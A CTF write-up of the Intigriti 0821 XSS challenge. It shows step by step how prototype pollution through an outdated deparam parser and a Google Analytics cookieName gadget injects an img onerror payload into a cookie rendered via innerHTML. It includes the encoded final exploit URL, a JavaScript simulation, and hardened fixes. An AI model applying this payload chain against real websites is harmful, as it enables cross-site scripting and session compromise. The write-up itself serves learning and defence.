Intigriti 0821-XSS Writeup
by @WHOISbinit
INTRO
Hi, I’m Piyush. This is my first writeup, and the first Intigriti challenge I have solved: I had attempted many of their earlier challenges, but their difficulty was always a level above me. This time I did solve it and got a kick start with Intigriti.
Challenge Intro
As every month, Intigriti hosted this month’s XSS challenge at https://challenge-0821.intigriti.io; the tweet announcing it is https://twitter.com/intigriti/status/1427232148835258374.
As stated on the challenge’s page, we need to find a way to execute arbitrary JavaScript on the challenge page. However, there are a few rules:
Rules:
* Should work on the latest version of Firefox or Chrome
* Should execute alert(document.domain).
* Should leverage a cross site scripting vulnerability on this domain.
* Shouldn't be self-XSS or related to MiTM attacks
* Should be reported at go.intigriti.com/submit-solution
The rules are the usual ones: we need to find an XSS, but not a self-XSS.
Hints
Intigriti normally releases a hint at every 100 likes on Twitter, but this time the hints were posted on Discord.
TIP 1: The Google Analytics script was not just included for tracking all of you, it may or may not contain some useful gadget!
TIP 2: Wait, you’re telling me that deparam script hasn't been updated in 5 years? That can't be good!
We will come back to these hints later.
Surfing the challenge
I found two things while surfing the challenge:
- The first thing anybody does when visiting the URL is view the source code, and the source reveals an iframe pointing at “https://challenge-0821.intigriti.io/challenge/cooking.html”, which looks like our target.
- I also found a cookie containing the same username value as the welcome title, and changing the cookie also changes the welcome title (this looks interesting).
Exploring challenge/cooking.html
Viewing the source of this page reveals some useful information: under the “The collection” header there are some links whose recipe parameter is base64 encoded, and at the bottom there are some JavaScript files that we will come back to later.
For now, let’s see what those base64 encoded values hold for us.
Let’s open the first link, “The basic XSS”, and in parallel decode the base64 value of that link.
Clicking the first link fills the page with values for Recipe, Ingredients, Payload & Steps.
Now let’s check the base64 encoded value:
<li><a href="cooking.html?recipe=dGl0bGU9VGhlJTIwYmFzaWMlMjBYU1MmaW5ncmVkaWVudHMlNUIlNUQ9QSUyMHNjcmlwdCUyMHRhZyZpbmdyZWRpZW50cyU1QiU1RD1Tb21lJTIwamF2YXNjcmlwdCZwYXlsb2FkPSUzQ3NjcmlwdCUzRWFsZXJ0KDEpJTNDL3NjcmlwdCUzRSZzdGVwcyU1QiU1RD1GaW5kJTIwdGFyZ2V0JnN0ZXBzJTVCJTVEPUluamVjdCZzdGVwcyU1QiU1RD1FbmpveQ==">The basic XSS</a></li>
Decoding the base64 gives this:
title=The%20basic%20XSS&ingredients%5B%5D=A%20script%20tag&ingredients%5B%5D=Some%20javascript&payload=%3Cscript%3Ealert(1)%3C/script%3E&steps%5B%5D=Find%20target&steps%5B%5D=Inject&steps%5B%5D=Enjoy
A further URL decode gives us a clear view:
title=The basic XSS&ingredients[]=A script tag&ingredients[]=Some javascript&payload=<script>alert(1)</script>&steps[]=Find target&steps[]=Inject&steps[]=Enjoy
So the base64 decoded value holds the Recipe, Ingredients, Payload & Steps. This is interesting: it means that modifying the URL affects the page itself. The question is how the page extracts the values from the URL and renders them, so some client-side code must be doing the work. It’s time to read the three JavaScript files we saw at the bottom of the source code.
Exploring main.js
In this file there are four functions; the main one is “handleLoad”, which calls the other three.
Before moving forward, let’s briefly understand what these three functions do:
Function readCookie :- As the name says, this function reads the value of the cookie whose name is passed as the argument.
Function welcomeUser :- This function displays the welcome title on the page using the value of the username cookie.
Function generateRecipeText :- This function takes the object built from the decoded base64 value in the URL and prints the Recipe, Ingredients, Payload & Steps on the page.
Function handleLoad :- As said above, this is the main function. First it sets a username variable from “readCookie”, then it checks whether the username is empty and, if so, creates a new random username cookie. Next, the base64 encoded URL parameter is decoded and converted into an object; then the ga function is called, which we will discuss later. After that, welcomeUser is called with the value from readCookie, then generateRecipeText takes the recipe object as input and prints its values on the page, and finally the recipe object is logged to the console.
There is also an event listener at the end which calls handleLoad.
Now important things to note:
1. The function welcomeUser is vulnerable to HTML injection: it sets the welcome title’s innerHTML, whereas generateRecipeText uses innerText. So changing the username cookie to the value below makes an alert pop up.
<img src=x onerror=alert(document.domain)>
2. Two more things remain: the deparam function called when building the recipe variable, and the ga function called just below it. Both are imported from the other two JavaScript files listed below main.js, and together they will help us achieve our XSS. How? Let’s find out.
Exploit
So our goal is to set a cookie with name username and value <img src=x onerror=alert(document.domain)>.
The deparam function is used to build the recipe variable; it turns a query string into an object (nested objects, arrays, etc.), and in HINT 2 Intigriti is talking about deparam.
So the deparam function is useful to us. How?
Objects: as I just said, this script turns strings into objects, so the first object-related attack that comes to mind is prototype pollution. If you haven’t heard of it, that’s totally fine; it takes experience to figure these things out. For now, think of it as a bug that lets an attacker inject properties into an object’s prototype, so that every object inherits them. If anything is unclear, I have added some references at the bottom to learn more.
So we have figured out that we need a prototype pollution attack, but what payload should we use?
Like XSS, prototype pollution has many payloads depending on the gadget available. So which payload to look for? Here HINT 1 comes to the rescue: “The Google Analytics script”, in short our ga function.
Searching Google for prototype pollution with the Google Analytics script leads to this page: https://github.com/BlackFan/client-side-prototype-pollution/blob/master//gadgets/google-analytics.md
and here you will find our payload:
?__proto__[cookieName]=COOKIE%3DInjection%3B
Now remove the leading ‘?’ (we already have one before the recipe param) and modify the payload:
__proto__[cookieName]=username%3D<img%20src%3dx%20onerror%3dalert(document.domain)>%3B
Now base64 encode the payload and use it as the value of the recipe param:
X19wcm90b19fW2Nvb2tpZU5hbWVdPXVzZXJuYW1lJTNEPGltZyUyMHNyYyUzZHglMjBvbmVycm9yJTNkYWxlcnQoZG9jdW1lbnQuZG9tYWluKT4lM0I=
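To make the chain concrete, here is an added example (not the challenge’s own code, nor the real deparam or Google Analytics scripts): a minimal deparam-style parser in a vulnerable and a hardened version, a stand-in for the analytics “cookieName” gadget the hints point at, and the base64 decoding of the recipe parameter shown earlier. The gadget’s behaviour and the cookie jar are simulated assumptions so that the whole thing runs without a browser; the polluting query string is the one from the gadget page above.

```javascript
// Added example: simulated deparam + analytics gadget chain (nothing here is
// the original challenge code; the gadget and cookie jar are stand-ins).

const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// The recipe parameter is base64 of a URL-encoded query string.
function decodeRecipeParam(b64) {
  return typeof atob === "function" ? atob(b64) : Buffer.from(b64, "base64").toString("latin1");
}

// "ingredients[]" -> ["ingredients", ""], "__proto__[cookieName]" -> ["__proto__", "cookieName"]
function parseKeyPath(rawKey) {
  const m = rawKey.match(/^([^\[]+)((?:\[[^\]]*\])*)$/);
  if (!m) return [rawKey];
  const keys = [m[1]];
  const re = /\[([^\]]*)\]/g;
  let seg;
  while ((seg = re.exec(m[2])) !== null) keys.push(seg[1]);
  return keys;
}

// Walks the key path and assigns the value; an empty segment ("[]") appends to an array.
function assignPath(root, keys, value) {
  let cur = root;
  for (let i = 0; i < keys.length; i++) {
    const k = keys[i];
    const last = i === keys.length - 1;
    if (k === "") {
      if (!Array.isArray(cur)) return;
      if (last) { cur.push(value); return; }
      const next = {};
      cur.push(next);
      cur = next;
      continue;
    }
    if (last) { cur[k] = value; return; }
    if (cur[k] === undefined) cur[k] = keys[i + 1] === "" ? [] : {};
    cur = cur[k]; // for k === "__proto__" this is Object.prototype
  }
}

function splitPair(pair) {
  const eq = pair.indexOf("=");
  const dec = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  return eq < 0 ? [dec(pair), ""] : [dec(pair.slice(0, eq)), dec(pair.slice(eq + 1))];
}

// Vulnerable: follows whatever property the key names, so "__proto__[x]=y"
// ends up assigning Object.prototype.x = "y" (prototype pollution).
function deparamVulnerable(query) {
  const obj = {};
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const [key, val] = splitPair(pair);
    assignPath(obj, parseKeyPath(key), val);
  }
  return obj;
}

// Hardened: drop any pair whose path contains a prototype-reaching segment.
function deparamSafe(query) {
  const obj = {};
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const [key, val] = splitPair(pair);
    const keys = parseKeyPath(key);
    if (keys.some((k) => BLOCKED_KEYS.has(k))) continue;
    assignPath(obj, keys, val);
  }
  return obj;
}

// Mimics a document.cookie assignment: text before the first ';' is the
// name=value pair, the rest is attributes.
function setCookie(jar, cookieStr) {
  const first = cookieStr.split(";")[0];
  const eq = first.indexOf("=");
  jar[first.slice(0, eq)] = first.slice(eq + 1);
}

// Stand-in for the analytics gadget (assumption): an optional cookieName from
// its config is used as the cookie name. Plain property access also sees
// inherited values, so a polluted Object.prototype.cookieName is picked up.
function gaGadgetVulnerable(config, jar) {
  const name = config.cookieName || "_ga";
  setCookie(jar, name + "=GA1.1.constructed; path=/");
}

// Hardened gadget: only an own property of the config object counts.
function gaGadgetSafe(config, jar) {
  const name = Object.prototype.hasOwnProperty.call(config, "cookieName") ? config.cookieName : "_ga";
  setCookie(jar, name + "=GA1.1.constructed; path=/");
}

// Runs parser -> gadget on a fresh jar and cleans Object.prototype afterwards.
function runChain(query, deparam, gadget) {
  const jar = {};
  try {
    deparam(query);
    gadget({}, jar); // the gadget's own config never sets cookieName
  } finally {
    delete Object.prototype.cookieName;
  }
  return jar;
}

const POLLUTING_QUERY = "__proto__[cookieName]=COOKIE%3DInjection%3B"; // from the gadget page
console.log(runChain(POLLUTING_QUERY, deparamVulnerable, gaGadgetVulnerable)); // { COOKIE: 'Injection' }
console.log(runChain(POLLUTING_QUERY, deparamSafe, gaGadgetVulnerable));       // { _ga: 'GA1.1.constructed' }
console.log(runChain(POLLUTING_QUERY, deparamVulnerable, gaGadgetSafe));       // { _ga: 'GA1.1.constructed' }
```

Either fix on its own breaks the chain: the parser refusing prototype-reaching keys stops the pollution, and the gadget reading only own properties stops a polluted prototype from choosing the cookie name. Both are worth applying, since a page usually has more than one gadget and more than one parser.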
Final Payload
https://challenge-0821.intigriti.io/challenge/cooking.html?recipe=X19wcm90b19fW2Nvb2tpZU5hbWVdPXVzZXJuYW1lJTNEPGltZyUyMHNyYyUzZHglMjBvbmVycm9yJTNkYWxlcnQoZG9jdW1lbnQuZG9tYWluKT4lM0I=
!!!XSS FIRED!!!
Some references for prototype pollution:
https://www.youtube.com/watch?v=J3MIOIqvV8w
https://www.youtube.com/watch?v=Gv1nK6Wj8qM